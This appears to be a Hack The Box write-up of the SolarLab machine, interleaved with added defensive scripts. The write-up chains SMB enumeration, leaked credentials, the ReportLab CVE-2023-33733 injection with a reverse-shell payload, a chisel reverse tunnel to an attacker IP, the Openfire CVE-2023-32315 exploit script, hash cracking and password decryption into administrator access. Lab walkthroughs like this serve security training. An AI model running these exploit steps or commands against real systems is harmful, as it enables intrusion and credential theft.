
HTB - SolarLab

SolarLab - A walkthrough of the challenge with enumeration, exploitation and privilege escalation steps.




**<u>NMAP</u>**

image1

- Add `solarlab.htb` and `report.solarlab.htb` to `/etc/hosts`

- Enumerate port 445:

```bash
enum4linux -u Guest -p "" -a solarlab.htb
```

image2

- Enumerate the share:

image3

- Download the content and look for metadata:

```bash
exiftool concepts/* old_leave_request_form.docx details-file.xlsx | grep "Modified"
exiftool concepts/* old_leave_request_form.docx details-file.xlsx | grep "Creator"
```
![image4](../resources/0cc386b1f81c46adbbaa78b7c6cc83ed.png)
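The metadata check above relies on exiftool. As an added example (not from the original post), the script below reads the same fields directly from the OOXML package: `.docx` and `.xlsx` files are zip archives, and the values exiftool reports as Creator, Last Modified By and Modify Date live in `docProps/core.xml`. This is the check a defender would run over a share before documents are published, to see which usernames a file would leak. The sample document is constructed in memory by `make_sample_docx()`; the function names are this example's own.

```python
"""Extract author/modification metadata from OOXML files (.docx/.xlsx/.pptx).

Added example, not from the original post. OOXML documents are zip archives;
the fields exiftool reports as Creator, Last Modified By and Modify Date are
stored in docProps/core.xml. The sample document built by make_sample_docx()
is constructed here for the demonstration.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
    "dcterms": "http://purl.org/dc/terms/",
}

# core.xml element -> label, mirroring the exiftool tag names used on this page.
FIELDS = {
    "dc:creator": "Creator",
    "cp:lastModifiedBy": "LastModifiedBy",
    "dcterms:created": "CreateDate",
    "dcterms:modified": "ModifyDate",
}


def extract_office_metadata(data: bytes) -> dict:
    """Return the core-properties fields present in an OOXML file as a dict."""
    result = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        if "docProps/core.xml" not in zf.namelist():
            return result  # not OOXML, or the metadata part was stripped
        root = ET.fromstring(zf.read("docProps/core.xml"))
    for xpath, label in FIELDS.items():
        el = root.find(xpath, NS)
        if el is not None and el.text:
            result[label] = el.text.strip()
    return result


def leaked_identities(meta: dict) -> set:
    """Names that would be exposed if this file were shared (Creator / LastModifiedBy)."""
    return {v for k, v in meta.items() if k in ("Creator", "LastModifiedBy")}


def make_sample_docx(creator: str, modified_by: str, modified: str) -> bytes:
    """Build a minimal OOXML-style zip with only the parts this demo reads (constructed sample)."""
    core = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<cp:coreProperties xmlns:cp="%s" xmlns:dc="%s" xmlns:dcterms="%s" '
        'xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">'
        "<dc:creator>%s</dc:creator>"
        "<cp:lastModifiedBy>%s</cp:lastModifiedBy>"
        '<dcterms:modified xsi:type="dcterms:W3CDTF">%s</dcterms:modified>'
        "</cp:coreProperties>"
    ) % (NS["cp"], NS["dc"], NS["dcterms"], creator, modified_by, modified)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("docProps/core.xml", core)
        zf.writestr("word/document.xml", "<w:document/>")
    return buf.getvalue()


if __name__ == "__main__":
    sample = make_sample_docx("example.author", "another.user", "2024-01-01T10:00:00Z")
    meta = extract_office_metadata(sample)
    for key, value in meta.items():
        print(f"{key:15} {value}")
    print("identities exposed:", sorted(leaked_identities(meta)))
```

To audit a real share, read each file's bytes and pass them to `extract_office_metadata()`; files without a `docProps/core.xml` part simply return an empty dict.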

- Opening the .docx file:

![image5](../resources/85b1fa037fe442ada28c34409ba15883.png)

| Username                   | Password               |
|----------------------------|------------------------|
| Alexander.knight@gmail.com | al;ksdhfewoiuh         |
| Kalexander                 | dkjafblkjadsfgl        |
| Alexander.knight@gmail.com | d398sadsknr390         |
| blake.byte                 | ThisCanB3typedeasily1@ |
| AlexanderK                 | danenacia9234n         |
| ClaudiaS                   | dadsfawe9dafkn         |


**<u>Enumerate port 6791:</u>**

- We get a login page:

![image6](../resources/ec8455b326bb4969af4a87dbf043c4f7.png)

- If we use **BlakeB** with the password **ThisCanB3typedeasily1@**, we can log in to report.solarlab.htb:6791

![image7](../resources/2b3eaa0fe1074152ae6dd5785e6800d5.png)

- All of these options are the same as below:

![image8](../resources/b756f09c75d5497988f04395ec9b8b12.png)


![image9](../resources/752fc97e7f024be8913038b21cb509ad.png)

- Generate a PDF
- Use exiftool to view the PDF:

![image10](../resources/11a4740779cd418c8fb7498cbfc9bc14.png)

- We can see that **ReportLab** is being used as the PDF generator

- There is an exploit for ReportLab - **CVE-2023-33733**
<https://github.com/c53elyas/CVE-2023-33733>

**<u>Exploit steps:</u>**

- Open Burp
- Click on Leave Request
- Capture the request with Burp:

![image11](../resources/9cd7df414f6d4c2fa1401a48ccbcead1.png)

- What we need to **change** is the parameter **"leave_request"**

- On GitHub there's a PoC:
<https://github.com/c53elyas/CVE-2023-33733>

There is no need to git clone the repo.

- If we scroll down to the bottom of the page:

![image12](../resources/b7017fdd553146abad33ba853b8364bb.png)

We can see the HTML code that needs to be injected in order to reach the **os.system** call

- Now if we go over to revshells and get the PowerShell #3 base64 code:

![image13](../resources/9cac1a668a864d2bbf8ade573e4ceadb.png)

- We can input that in the system() function instead


![image14](../resources/8408678b25644e31ac2d962e3e572846.png)
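The injection above works because ReportLab evaluated colour attribute values in paragraph markup (such as `<font color="...">`) as Python expressions. The durable fix is upgrading to a patched ReportLab release; the following added example (not from the original post, nor ReportLab's own code) shows the defensive filter a report-generating application should apply on top of that: any colour value that is not a plain colour name or hex code is refused before the markup reaches the PDF generator. The set of attributes treated as colour-valued (any attribute whose name ends in `color`) and the sample inputs are this example's assumptions.

```python
"""Allowlist colour attributes in user-supplied ReportLab paragraph markup.

Added example, not from the original post or from ReportLab. CVE-2023-33733
is reached through colour attribute values that ReportLab evaluated as Python
expressions. Upgrading ReportLab is the real fix; this filter additionally
refuses to forward any colour value that is not a bare colour name or a hex
code, so expression-like values never reach the PDF generator. Attribute
coverage (any attribute name ending in "color") is an assumption.
"""
import re

# A value we are willing to pass through: a bare name or #rgb / #rrggbb / #rrggbbaa.
SAFE_COLOR = re.compile(
    r"^(?:[A-Za-z]{1,32}|#(?:[0-9A-Fa-f]{3}|[0-9A-Fa-f]{6}|[0-9A-Fa-f]{8}))$"
)

# Any attribute whose name ends in "color", with a single- or double-quoted value.
COLOR_ATTR = re.compile(
    r"""(?P<name>\b[A-Za-z]*color)\s*=\s*(?P<q>["'])(?P<value>.*?)(?P=q)""",
    re.IGNORECASE | re.DOTALL,
)


def is_safe_color(value: str) -> bool:
    """True if the value is a plain colour name or hex code (never an expression)."""
    return bool(SAFE_COLOR.match(value.strip()))


def find_unsafe_colors(markup: str) -> list:
    """Return every colour attribute value in the markup that fails the allowlist."""
    return [m.group("value") for m in COLOR_ATTR.finditer(markup)
            if not is_safe_color(m.group("value"))]


def sanitize_markup(markup: str, fallback: str = "black") -> str:
    """Replace unsafe colour values with a fixed fallback colour, keeping the rest intact."""
    def fix(m):
        if is_safe_color(m.group("value")):
            return m.group(0)
        return f'{m.group("name")}={m.group("q")}{fallback}{m.group("q")}'
    return COLOR_ATTR.sub(fix, markup)


def validate_leave_request(text: str) -> str:
    """Reject the submission outright if any colour attribute is not an allowlisted value.

    A server would call this on the leave_request field before rendering the PDF.
    """
    bad = find_unsafe_colors(text)
    if bad:
        raise ValueError(f"rejected {len(bad)} colour attribute(s) that are not plain colours")
    return text


if __name__ == "__main__":
    ok = '<para>Leave from <font color="#2255aa">1 May</font> to <b>5 May</b></para>'
    # Constructed: the value is a bracketed expression rather than a colour name.
    suspicious = '<para><font color="[[1, 2, 3]]">sick leave</font></para>'
    print(validate_leave_request(ok))
    print(find_unsafe_colors(suspicious))
    print(sanitize_markup(suspicious))
```

Rejecting (`validate_leave_request`) is preferable to rewriting (`sanitize_markup`) for a form field, since a submission carrying expression syntax in a colour attribute is worth logging rather than silently repairing.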

- Set up a listener
- Send the request

- And we get a shell as Blake:

![image15](../resources/d764af43f2f84da49edf1770cba4b934.png)


![image16](../resources/cec224e781f34f24b0df895804041936.png)

```bash
cat user.txt
```
- In the current app directory we get the instance dir, which contains a db file:

image17

- alexanderk - HotP!fireguard’
- claudias - 007poiuytrewq
- blakeb - ThisCanB3typedeasily1@

- We can see a lot of ports running locally:

image18

Upload chisel.

- On Kali:

```bash
./chisel server -p 8888 --reverse
```

- On target:

```bash
.\chisel.exe client 10.10.14.69:8888 R:socks &
```

- Then scan the loopback interface through the SOCKS proxy:

```bash
proxychains nmap 127.0.0.1 -sT
```

image19

- Openfire is running locally and its admin console runs on port 9090:

image20

- We get the Openfire version, 4.7.4, which leads us to CVE-2023-32315

**<u>CVE-2023-32315</u>**

This exploit can be done manually:

<https://www.vicarius.io/vsociety/posts/cve-2023-32315-path-traversal-in-openfire-leads-to-rce>

or using a script:

```bash
git clone https://github.com/miko550/CVE-2023-32315.git
```

- Since we don't have a valid user, do the following:

```bash
cd CVE-2023-32315
pip3 install -r requirements.txt
proxychains python3 CVE-2023-32315.py -t http://127.0.0.1:9090
```

image21

- It created a user for us by retrieving the CSRF and JSESSIONID tokens and crafting a new user: username `lyy10y`, password `llq47k`
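The script above gets its unauthenticated access through the console's setup path. Public analyses of CVE-2023-32315 describe requests whose raw path starts with `/setup/` (a prefix the console's authentication filter allowed) but which carry non-standard `%uXXXX`-encoded or `;`-decorated dot-dot segments, so that once the servlet container decodes them they resolve to an admin page outside `/setup/`. The following added example (not from the original post or from Openfire) is the detection side: it normalises request targets the way a container would and flags access-log lines where the raw and resolved prefixes disagree. The log format, the `/setup/` prefix list and the sample lines are constructed assumptions.

```python
"""Spot admin-console requests that use encoded traversal to escape the /setup/ prefix.

Added example, not from the original post or from Openfire. The scanner decodes
%uXXXX and %XX escapes, strips ';' path parameters, resolves '.' and '..', and
flags requests whose raw path sits under an unauthenticated prefix while the
resolved path does not. Log format and sample lines are constructed.
"""
import re
from urllib.parse import unquote

PERCENT_U = re.compile(r"%u([0-9A-Fa-f]{4})")
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')

# Prefixes a prefix-based auth filter lets through without a session (assumption).
UNAUTHENTICATED_PREFIXES = ("/setup/",)


def decode_target(raw: str) -> str:
    """Decode %uXXXX (non-standard) escapes first, then ordinary %XX escapes."""
    once = PERCENT_U.sub(lambda m: chr(int(m.group(1), 16)), raw)
    return unquote(once)


def normalize_path(raw_target: str) -> str:
    """Resolve '.', '..' and ';param' decorations after decoding, as a servlet container would."""
    path = decode_target(raw_target.split("?", 1)[0])
    stack = []
    for seg in path.split("/"):
        seg = seg.split(";", 1)[0]  # drop path parameters such as '..;'
        if seg in ("", "."):
            continue
        if seg == "..":
            if stack:
                stack.pop()
            continue
        stack.append(seg)
    return "/" + "/".join(stack)


def is_prefix_bypass(raw_target: str) -> bool:
    """True when the raw path sits under an unauthenticated prefix but resolves outside it."""
    raw_path = raw_target.split("?", 1)[0]
    if not raw_path.startswith(UNAUTHENTICATED_PREFIXES):
        return False
    return not normalize_path(raw_target).startswith(UNAUTHENTICATED_PREFIXES)


def scan_log(lines) -> list:
    """Return (line_number, raw_target, resolved_path) for each request that bypasses the prefix check."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if m and is_prefix_bypass(m.group("target")):
            hits.append((n, m.group("target"), normalize_path(m.group("target"))))
    return hits


# Constructed sample in common log format; only the third line escapes /setup/.
SAMPLE_LOG = [
    '127.0.0.1 - - [01/Jan/2024:10:00:00 +0000] "GET /login.jsp HTTP/1.1" 200 2048',
    '127.0.0.1 - - [01/Jan/2024:10:00:01 +0000] "GET /setup/index.jsp HTTP/1.1" 200 1024',
    '127.0.0.1 - - [01/Jan/2024:10:00:02 +0000] "GET /setup/setup-s/%u002e%u002e/%u002e%u002e/admin-page.jsp?x=1 HTTP/1.1" 200 4096',
    '127.0.0.1 - - [01/Jan/2024:10:00:03 +0000] "GET /setup/%2e/index.jsp HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for n, raw, resolved in scan_log(SAMPLE_LOG):
        print(f"line {n}: {raw} -> {resolved}")
```

The fourth sample line shows why the check compares resolved prefixes rather than simply flagging any percent-encoding: `/setup/%2e/index.jsp` is odd but still resolves inside `/setup/`, while the third line resolves to the console root.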

- Log in to the admin console with the new credentials

- Go to the Plugins page
- Upload the plugin (openfire-management-tool-plugin.jar) found in the git repo

image22

- Successfully uploaded, and the password is 123

image23

- Go to Server -> Server Settings -> Management Tool (if you take too long, you need to re-upload the plugin)

image24

- And we're user Openfire:

image25

- Using PowerShell #3 from revshells and setting up a listener, we get a shell:

image26

image27

- Upgrade to Meterpreter:

image28

image29

```bash
hashcat -a 0 -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
```

image30

- In `C:\Program Files\Openfire` we get an embedded-db folder, which contains some interesting files

- The openfire.script file is the "database", or more specifically a file with all the SQL commands that rebuild it

image31

- In here we can see an encrypted password for Administrator and a passwordKey:

image32
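The exposure here is that `openfire.script` stores the Blowfish-encrypted password (ofUser.encryptedPassword) and the key that decrypts it (the `passwordKey` property) side by side in the same file. As an added example (not from the original post or from Openfire), the parser below reads the HSQLDB script format: it takes the column names from the `CREATE TABLE` statements, maps each `INSERT` by position, and reports which accounts rely on reversible storage (encrypted or plaintext password) versus SCRAM keys, and whether the key is present. This is the audit a defender would run on an Openfire backup. The `ofUser`/`ofProperty` column layout follows the Openfire 4.x schema as recalled here, and the sample script uses placeholder values.

```python
"""Audit an Openfire embedded-db openfire.script for reversible credential storage.

Added example, not from the original post or from Openfire. openfire.script is
an HSQLDB script: CREATE TABLE statements followed by INSERT statements that
rebuild the database. This parser reads column names from the CREATE statements,
maps each INSERT by position, and reports accounts whose password is stored in
reversible form (ENCRYPTEDPASSWORD / PLAINPASSWORD) next to the passwordKey
property that decrypts them. Column names follow the Openfire 4.x schema as
recalled here; SAMPLE_SCRIPT is constructed with placeholder values.
"""
import re

CREATE_RE = re.compile(r"^CREATE\s+(?:MEMORY\s+|CACHED\s+)?TABLE\s+(?:PUBLIC\.)?(\w+)\s*\((.*)\)\s*$", re.I)
INSERT_RE = re.compile(r"^INSERT\s+INTO\s+(?:PUBLIC\.)?(\w+)\s+VALUES\s*\((.*)\)\s*$", re.I)
CONSTRAINT_WORDS = ("CONSTRAINT", "PRIMARY", "UNIQUE", "FOREIGN", "CHECK")


def split_top_level(body: str) -> list:
    """Split on commas that are not inside parentheses or single-quoted strings."""
    parts, depth, quoted, cur = [], 0, False, []
    for ch in body:
        if ch == "'":
            quoted = not quoted  # a doubled '' toggles twice and stays inside the string
        elif not quoted:
            if ch == "(":
                depth += 1
            elif ch == ")":
                depth -= 1
            elif ch == "," and depth == 0:
                parts.append("".join(cur).strip())
                cur = []
                continue
        cur.append(ch)
    if cur:
        parts.append("".join(cur).strip())
    return parts


def parse_value(tok: str):
    """Turn one SQL literal into a Python value (string, int, or None)."""
    if tok.upper() == "NULL":
        return None
    if tok.startswith("'") and tok.endswith("'"):
        return tok[1:-1].replace("''", "'")
    try:
        return int(tok)
    except ValueError:
        return tok


def parse_script(text: str) -> dict:
    """Return {TABLE: [row_dict, ...]} for every table defined and populated in the script."""
    columns, rows = {}, {}
    for line in text.splitlines():
        m = CREATE_RE.match(line.strip())
        if m:
            table = m.group(1).upper()
            cols = [item.split()[0].upper() for item in split_top_level(m.group(2))
                    if item.split()[0].upper() not in CONSTRAINT_WORDS]
            columns[table] = cols
            rows.setdefault(table, [])
            continue
        m = INSERT_RE.match(line.strip())
        if m:
            table = m.group(1).upper()
            values = [parse_value(v) for v in split_top_level(m.group(2))]
            cols = columns.get(table) or [f"col{i}" for i in range(len(values))]
            rows.setdefault(table, []).append(dict(zip(cols, values)))
    return rows


def audit_credentials(text: str) -> dict:
    """Flag accounts stored with reversible passwords and whether the decrypting key is present."""
    data = parse_script(text)
    props = {r.get("NAME"): r.get("PROPVALUE") for r in data.get("OFPROPERTY", [])}
    reversible = []
    for user in data.get("OFUSER", []):
        if user.get("ENCRYPTEDPASSWORD"):
            reversible.append((user["USERNAME"], "encrypted"))
        elif user.get("PLAINPASSWORD"):
            reversible.append((user["USERNAME"], "plaintext"))
    key_present = "passwordKey" in props
    return {"reversible_accounts": reversible,
            "password_key_present": key_present,
            "exposed": bool(reversible) and key_present}


# Constructed sample: one encrypted, one plaintext and one SCRAM-only account.
SAMPLE_SCRIPT = """\
SET DATABASE UNIQUE NAME HSQLDB_PLACEHOLDER
CREATE MEMORY TABLE PUBLIC.OFUSER(USERNAME VARCHAR(64) NOT NULL,STOREDKEY VARCHAR(32),SERVERKEY VARCHAR(32),SALT VARCHAR(32),ITERATIONS INTEGER,PLAINPASSWORD VARCHAR(32),ENCRYPTEDPASSWORD VARCHAR(255),NAME VARCHAR(100),EMAIL VARCHAR(100),CREATIONDATE VARCHAR(15) NOT NULL,MODIFICATIONDATE VARCHAR(15) NOT NULL,CONSTRAINT OFUSER_PK PRIMARY KEY(USERNAME))
CREATE MEMORY TABLE PUBLIC.OFPROPERTY(NAME VARCHAR(100) NOT NULL,PROPVALUE CLOB NOT NULL,ENCRYPTED INTEGER,IV CHARACTER(24),CONSTRAINT OFPROPERTY_PK PRIMARY KEY(NAME))
INSERT INTO OFUSER VALUES('admin',NULL,NULL,NULL,0,NULL,'0011223344556677ENCRYPTED_PLACEHOLDER','Administrator','admin@example.test','001700000000000','0')
INSERT INTO OFUSER VALUES('svc',NULL,NULL,NULL,0,'plain''pw',NULL,'Service','svc@example.test','001700000000000','0')
INSERT INTO OFUSER VALUES('scram','abc','def','xyz',4096,NULL,NULL,'Scram User','scram@example.test','001700000000000','0')
INSERT INTO OFPROPERTY VALUES('passwordKey','KEY_PLACEHOLDER',0,NULL)
INSERT INTO OFPROPERTY VALUES('xmpp.domain','example.test',0,NULL)
"""

if __name__ == "__main__":
    print(audit_credentials(SAMPLE_SCRIPT))
```

Accounts that only carry `storedKey`/`serverKey` (SCRAM) do not appear in `reversible_accounts`; the `exposed` flag is only raised when at least one reversible credential and the `passwordKey` are both in the file.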

- Luckily there is a repo for this:

<https://github.com/c0rdis/openfire_decrypt>

- Clone the repo

- Build the file:

```bash
javac OpenFireDecryptPass.java
```

- Enter the password and key:

image33

```bash
java OpenFireDecryptPass 'becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442' 'hGXiFzsKaAeYLjn'
```

image34

We get: `ThisPasswordShouldDo!@`

- Use RunasCs to run an msf payload:

```bash
.\runascs.exe administrator ThisPasswordShouldDo!@ ".\rev.exe"
```

image35

image36

This post is licensed under CC BY 4.0 by the author.